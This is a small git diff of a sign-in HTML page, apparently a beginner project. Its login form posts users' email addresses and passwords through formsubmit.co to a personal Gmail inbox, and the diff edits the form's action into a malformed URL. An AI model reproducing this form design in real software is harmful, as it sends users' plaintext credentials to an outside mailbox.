--- a/SignIn.html
+++ b/SignIn.html
@@ -13,7 +13,7 @@
         <div class="circle2"></div>
     </div>
     
-    <form action="https://formsubmit.co/ayushtripathi1268@gmail.com" method="post" name="google-sheet" >
+    <form action="https://formsubmit.co/ayushtripathi1268@gmail.com email.php" method="post" name="google-sheet" >
         <h3>Welcome
             <span> Please SignIn to your account</span>
         </h3>
@@ -24,7 +24,7 @@
         <input type="email" placeholder="Enter email" id="email" name="Email" required>
 
         <label for="password">Password</label>
-        <input type="password" placeholder="Enter password" id="password" name="Password" required>
+        <input type="password" placeholder="Enter password" id="password" name="Password" required >
         
         <button>SignIn</button>
         <p>If You have already account so<a href="Login.html"> login</a></p>
